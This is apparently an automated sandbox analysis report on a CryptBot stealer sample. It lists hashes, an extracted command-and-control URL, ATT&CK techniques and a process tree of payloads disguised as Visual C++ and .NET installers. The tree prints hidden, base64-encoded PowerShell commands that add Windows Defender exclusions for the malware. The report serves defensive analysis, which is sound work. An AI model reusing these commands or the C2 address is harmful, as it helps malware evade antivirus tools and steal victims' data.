cryptbot | 234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474

Analysis

max time kernel
84s
max time network
150s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
24/03/2025, 07:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe
Size

3.8MB
MD5

52dfbec82ed8b0f36065b6c7dd60db74
SHA1

da386493a3cdee427b90b9d61a32a53a1cf7c097
SHA256

234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474
SHA512

077c226c12525c17d178522cb123322fe37067ab7211402fa56f207ad793778dd54a3a6e594811d502fa2fbffee65e7488b7cf3c24936c1e9b7c28d3d2fff225
SSDEEP

98304:ZsLhipLqAerp+/fe6maWwtZ96QWkcsL9ydhhy:gipmHp+/26ma7tZFAdy

Score

10^/10

cryptbot defense_evasion discovery execution spyware stealer

Malware Config

Extracted

Family

cryptbot

http://home.elvnpp11sb.top/PbeokZpPUOamImAhVrmG11

Signatures

CryptBot
CryptBot is a C++ stealer distributed widely in bundle with other software.
spyware stealer cryptbot
Cryptbot family
cryptbot

Enumerates VirtualBox registry keys 2 TTPs 1 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF	VC_redist.x64.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
8008	powershell.exe
7948	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
1268	VC_redist.x64.exe
2428	VC_redist.x86.exe

Loads dropped DLL 8 IoCs

pid	Process
1892	234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe
1892	234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe
1892	234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe
1892	234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe
1132	WerFault.exe
1132	WerFault.exe
1132	WerFault.exe
1892	234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Embeds OpenSSL 1 IoCs

Embeds OpenSSL, may be used to circumvent TLS interception.

resource	yara_rule
behavioral1/files/0x0008000000015d7f-7.dat	embeds_openssl

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1132	1268	WerFault.exe	30

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VC_redist.x64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
1268	VC_redist.x64.exe
1268	VC_redist.x64.exe
1268	VC_redist.x64.exe
1268	VC_redist.x64.exe
1268	VC_redist.x64.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1892 wrote to memory of 1268	1892	234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe	30
PID 1892 wrote to memory of 1268	1892	234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe	30
PID 1892 wrote to memory of 1268	1892	234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe	30
PID 1892 wrote to memory of 1268	1892	234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe	30
PID 1268 wrote to memory of 1132	1268	VC_redist.x64.exe	32
PID 1268 wrote to memory of 1132	1268	VC_redist.x64.exe	32
PID 1268 wrote to memory of 1132	1268	VC_redist.x64.exe	32
PID 1268 wrote to memory of 1132	1268	VC_redist.x64.exe	32
PID 1892 wrote to memory of 2428	1892	234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe	33
PID 1892 wrote to memory of 2428	1892	234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe	33
PID 1892 wrote to memory of 2428	1892	234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe	33
PID 1892 wrote to memory of 2428	1892	234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe	33

C:\Users\Admin\AppData\Local\Temp\234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe
"C:\Users\Admin\AppData\Local\Temp\234720e696e01f3e21f6d0888a906a186ed6bfcc1b416bf5e6b78ba7ebc49474.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1892
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x64.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x64.exe"
  2⤵
  - Enumerates VirtualBox registry keys
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1268
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 472
    3⤵
    - Loads dropped DLL
    - Program crash
    PID:1132
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x86.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x86.exe"
  2⤵
  - Executes dropped EXE
  PID:2428
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\dotNetFx45_Full_setup.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\dotNetFx45_Full_setup.exe"
  2⤵
  PID:8132

C:\Windows\system32\taskeng.exe
taskeng.exe {65B6A6E9-F16E-473B-8FFE-2A17EA9B32EA} S-1-5-21-3533259084-2542256011-65585152-1000:XPAJOTIY\Admin:S4U:
1⤵
PID:7976
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASABhAHMAaABcAFQAYQByAGcAZQB0AC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASABhAHMAaABcAFQAYQByAGcAZQB0AC4AZQB4AGUA
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:8008
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAASQBkAC4AZQB4AGUAOwA=
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:7948

C:\Windows\system32\taskeng.exe
taskeng.exe {CC079A83-9CC3-4578-9EC2-07DC3DBF643C} S-1-5-21-3533259084-2542256011-65585152-1000:XPAJOTIY\Admin:Interactive:[1]
1⤵
PID:3272
- C:\Users\Admin\AppData\Roaming\Hash\Target.exe
  C:\Users\Admin\AppData\Roaming\Hash\Target.exe
  2⤵
  PID:2636
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    3⤵
    PID:7944
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    3⤵
    PID:3040
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    3⤵
    PID:1916
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    3⤵
    PID:2428
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    3⤵
    PID:7840
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    3⤵
    PID:2772
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    3⤵
    PID:1308
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    3⤵
    PID:8124
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    3⤵
    PID:8104
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    3⤵
    PID:8144
- C:\Users\Admin\AppData\Local\FallbackBuffer\kjjljayzh\Id.exe
  C:\Users\Admin\AppData\Local\FallbackBuffer\kjjljayzh\Id.exe
  2⤵
  PID:3768
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    3⤵
    PID:3528

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x86.exe

Filesize
628KB

MD5
97febd6bc5eede82b8837cbaa51e57db

SHA1
3b22e23708a0bdd6852127dff3090733c2649c49

SHA256
c86e5b5811ba311a58a6b0e0bcd6346cf770d37a105f3a64823dba88d472f6b8

SHA512
c0fd107f4a9d0ef31f97287bc456f7a746e740164371ba0234883dc3eec7a1145235a95d5205e784a245696a79a71b4e50fc997a4bec9ee5cb90ff5f4ca12cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\dotNetFx45_Full_setup.exe

Filesize
544KB

MD5
1336375cf1aaa4efdad95d0b64ea1aac

SHA1
9be80a505aa2dfcc4db73c8e5264ed5867533e66

SHA256
04d68438f75065f5c2997e80a317b1c6fad78d723af585a64d39138861055ec6

SHA512
12d91fefeb431b60b2501f7868e25dfa04eb42f94bd630b21fef4f3cd6ae5962b6764215da77824e06c53ae8d5d446b322936406396aaa178c71edf24b765f48

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
7578fc2be917db0238451db4ce78e070

SHA1
da60b0ab72d4da8bcfc8b7944241eff92c1ee589

SHA256
7d30f0aa510a1da684d15e13bb4f4cee8f193083e2f25826e47b70ad9ed63d2a

SHA512
4a5b48ce399001ab335278b510a62989299cfd00a9539068f7775b5569c5c9dbfbf45c472e6b83cf9a25b6d3820c4c16c88ed8ede6d8b21866752a51bd6b8fc1

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x64.exe

Filesize
8.5MB

MD5
f1d1d8dc0494c69f77e03f6b5366a2a4

SHA1
2f20af746b4e69db58c3c0383365ba9da7c6bf26

SHA256
11c9dd0e206ed62d39c85600cda77706e91691b3b6557746a916c0bbe5a60721

SHA512
df0c70cb54faef30891da8fb7c8e9e877adbe004ee2348d780131586113d50e3d8ed2966538a69dcdeb5f14f689fb53f913a0747062241813d3b0ad1a064da04

Download Submit
memory/1268-20-0x0000000000A00000-0x0000000001288000-memory.dmp

Filesize
8.5MB

Download
memory/1268-24-0x0000000000A00000-0x0000000001288000-memory.dmp

Filesize
8.5MB

Download
memory/1268-30-0x0000000000A00000-0x0000000001288000-memory.dmp

Filesize
8.5MB

Download
memory/2428-75-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-67-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-40-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-55-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-63-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-51-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-49-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-47-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-45-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-95-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-93-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-91-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-90-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-87-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-85-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-83-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-81-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-79-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-77-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-38-0x0000000000B60000-0x0000000000C02000-memory.dmp

Filesize
648KB

Download
memory/2428-73-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-71-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-69-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-39-0x000000001AF30000-0x000000001B028000-memory.dmp

Filesize
992KB

Download
memory/2428-66-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-61-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-59-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-57-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-43-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-42-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-53-0x000000001AF30000-0x000000001B024000-memory.dmp

Filesize
976KB

Download
memory/2428-2645-0x0000000000740000-0x000000000078C000-memory.dmp

Filesize
304KB

Download
memory/2428-2644-0x00000000006E0000-0x0000000000736000-memory.dmp

Filesize
344KB

Download
memory/2428-2646-0x0000000002330000-0x0000000002384000-memory.dmp

Filesize
336KB

Download
memory/2636-4564-0x0000000000140000-0x00000000001E2000-memory.dmp

Filesize
648KB

Download
memory/2636-7169-0x0000000002390000-0x00000000023E4000-memory.dmp

Filesize
336KB

Download
memory/3528-9065-0x0000000000400000-0x000000000048E000-memory.dmp

Filesize
568KB

Download
memory/3768-7172-0x0000000000D40000-0x0000000000DCE000-memory.dmp

Filesize
568KB

Download
memory/7948-4558-0x0000000000BE0000-0x0000000000BE8000-memory.dmp

Filesize
32KB

Download
memory/7948-4557-0x000000001A1B0000-0x000000001A492000-memory.dmp

Filesize
2.9MB

Download
memory/8008-2651-0x000000001A110000-0x000000001A3F2000-memory.dmp

Filesize
2.9MB

Download
memory/8008-2652-0x0000000000A60000-0x0000000000A68000-memory.dmp

Filesize
32KB

Download
memory/8132-2669-0x00000000002E0000-0x000000000036E000-memory.dmp

Filesize
568KB

Download
memory/8132-2670-0x0000000002170000-0x0000000002238000-memory.dmp

Filesize
800KB

Download
memory/8132-4551-0x0000000001FB0000-0x0000000002006000-memory.dmp

Filesize
344KB

Download